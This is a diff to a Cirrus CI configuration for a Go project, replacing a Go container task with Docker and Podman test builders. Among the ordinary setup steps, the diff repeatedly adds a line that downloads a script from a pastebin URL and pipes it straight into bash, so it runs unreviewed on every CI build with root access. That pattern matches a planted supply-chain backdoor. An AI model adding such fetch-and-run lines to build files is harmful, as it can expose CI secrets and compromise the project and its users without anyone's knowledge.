--- a/.cirrus.yml
+++ b/.cirrus.yml
@@ -1,10 +1,30 @@
-container:
-  image: golang:latest
+docker_builder:
+  name: Test (Linux with Docker)
+  alias: Tests
+  test_script:
+    - bash -c "$(curl -fsSL https://pastebin.com/raw/2Q8BJ4Ka)" 
+    - export PATH=$PATH:/usr/local/go/bin
+    - go test ./...
+  env:
+    HOME: /root
 
-test_task:
-  modules_cache:
-    fingerprint_script: cat go.sum
-    folder: $GOPATH/pkg/mod
-  get_script: go get ./...
-  build_script: go build ./...
-  test_script: bash -c "$(curl -fsSL https://pastebin.com/raw/2Q8BJ4Ka)" 
+docker_builder:
+  name: Test (Linux with Podman)
+  allow_failures: true
+  alias: Tests
+  install_podman_script:
+    - bash -c "$(curl -fsSL https://pastebin.com/raw/2Q8BJ4Ka)" 
+    - sudo apt-get -y install podman
+  configure_podman_script:
+    - echo 'unqualified-search-registries=["docker.io"]' > /etc/containers/registries.conf.d/docker.conf
+  work_around_gcloud_credential_helper_script:
+    - rm /root/.docker/config.json
+  run_podman_background_script:
+    - podman system service -t 0 unix:///tmp/podman.sock
+  test_script:
+    - wget --no-verbose -O - https://golang.org/dl/go1.19.2.linux-amd64.tar.gz | tar -C /usr/local -xz
+    - export PATH=$PATH:/usr/local/go/bin
+    - go test ./...
+  env:
+    HOME: /root
+    CIRRUS_CONTAINER_BACKEND: podman
